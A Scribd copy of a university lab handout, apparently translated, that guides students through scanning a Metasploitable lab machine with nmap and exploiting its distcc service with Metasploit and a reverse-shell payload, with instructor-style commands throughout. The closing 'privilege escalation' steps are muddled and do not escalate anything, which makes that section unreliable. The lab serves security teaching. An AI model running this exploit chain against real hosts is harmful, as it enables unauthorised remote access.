Scribd
Upload
2 views3 pages

Metasploit Lab

The document outlines a penetration testing methodology for a Networks & Telecommunications Engineering program at Cadi Ayyad University. It details the stages of reconnaissance, scanning, exploitation, and privilege escalation, using tools like nmap and Metasploit to identify and exploit vulnerabilities. The focus is on the distcc vulnerability, guiding users through commands to gain access to a vulnerable machine.

Uploaded by

ScribdTranslations
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
2 views3 pages

Metasploit Lab

The document outlines a penetration testing methodology for a Networks & Telecommunications Engineering program at Cadi Ayyad University. It details the stages of reconnaissance, scanning, exploitation, and privilege escalation, using tools like nmap and Metasploit to identify and exploit vulnerabilities. The focus is on the distcc vulnerability, guiding users through commands to gain access to a vulnerable machine.

Uploaded by

ScribdTranslations
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd

Cadi Ayyad University Academic year: 2018-2019

National School of Applied Sciences GRT2


Networks & Telecommunications Engineering Program Dr. Anas Abou el Kalam

Marrakech Mouhsine Elallouchi

TP
1) The recognition stage:

1-1 At this stage, the pentester attempts to find IP addresses, domain names, DNS,

In our lab, we will find only the IP of the vulnerable machine (Metasploitable) using the

Command:> ifconfig

1-2 Now we have the @ IP, we will test the connectivity between Kali Linux and the test machine.

Using the command: > ping @ip

2) The Scanning stage: Searching for open ports and


Vulnerabilities

At this stage, we focus on open ports and the services used, then we move on to the analysis of

Vulnerability if you have Nessus you will use it otherwise if there is no internet connection

We will just use nmap, the famous tool, with a simple script just to understand it.

Methodology.

1-1 Launch the command > nmap -sS @ip which will execute quickly and allows
the scanner:

thousands of ports per second on a fast network

1-2 After analyzing the open ports and the services used, we will execute the command

Nmap -script vuln allows you to see some risks that could harm the machine.

1-3 We choose the vulnerability that will allow us to penetrate the system
The use of Nessus allows us to quickly identify the most dangerous vulnerability.

It's not a big deal, in our case we will use: distcc

3) The exploitation phase or Gaining Access:

In this step, we will use a very powerful tool: Metasploit

1-1) Start metasploit by typing: > msfconsole. (this may take a few minutes)

1-2) Search for the distcc vulnerability: search distcc

1-3) The research will present us with some exploits to use, so we choose the exploit:

Using the command: use /exploit/.. /..

N.B :

Vulnerability - A flaw in a system that can be used as a means of attack.

Exploit - A program specifically designed to exploit a vulnerability. It contains the


Payload.

Payload – the code to be executed on the system once the vulnerability has been exploited.

1-4) Know the payloads that I can use with the exploit I have chosen. Type:

> Showpayloads

1-5) We will use the payload /cmd/unix/reverse using the cmd:

Set payload /cmd/unix/reverse

> Set RHOST @Machine vulnerable

> Set LHOST @ KALI

1-6) Now we are going to exploit:

Exploit

Now we are in the vulnerable machine to know our position we launch the
command: > whoami
4) The privilege escalation stage:

1-click Ctrl+C to end the session.

2-tapez : > exploit –j

3-tapez : > whoami

Very well now you can do whatever you want.

You might also like